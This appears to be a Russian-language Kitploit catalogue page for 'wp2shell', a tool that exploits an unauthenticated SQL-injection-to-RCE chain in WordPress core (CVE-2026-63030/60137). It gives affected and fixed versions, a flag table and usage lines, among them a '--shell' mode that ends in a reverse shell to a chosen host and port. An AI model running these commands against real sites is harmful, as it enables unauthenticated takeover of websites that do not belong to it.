Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-63030 — PoC-эксплойт для неаутентифицированного RCE в ядре WordPress, известный как WP2Shell | Kitploit
Инструменты/GitHubGitHub/mverschu/cve-2026-63030
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubmverschu/cve-2026-63030

CVE-2026-63030

PoC-эксплойт для неаутентифицированного RCE в ядре WordPress, известный как WP2Shell

Репозиторий
411 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

wp2shell (CVE-2026-63030 / CVE-2026-60137)

Namewp2shell
CVEsCVE-2026-63030 (десинхронизация batch), CVE-2026-60137 (author__not_in SQLi)
Затронутые версииWordPress 6.9.0–6.9.4, 7.0.0–7.0.1
Исправлено в6.9.5, 7.0.2
Требуется аутентификацияНе требуется
ОбнаружилAdam Kues (Searchlight Cyber / Assetnote)

Использование

Голый хост = автоопределение схемы (сначала пробуется https://, затем http://). Добавляйте http:// или https:// только когда нужно принудительно задать одну из них.

root@kitploit:~
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080

# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/

# timing confirm
wp2shell target.example --confirm-sqli

# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
Скачать инструмент
ФлагЧто делает
--shell [LHOST [LPORT]]штатная цепочка RCE; по умолчанию LHOST — IP этого компьютера, LPORT — 443
--rest-routeсначала пробовать /?rest_route=/batch/v1
--verify-tlsпроверять TLS-сертификаты (по умолчанию отключено для лабораторных/самоподписанных)
--proxy URLпропускать трафик через прокси
--forceпропустить определение WordPress по отпечаткам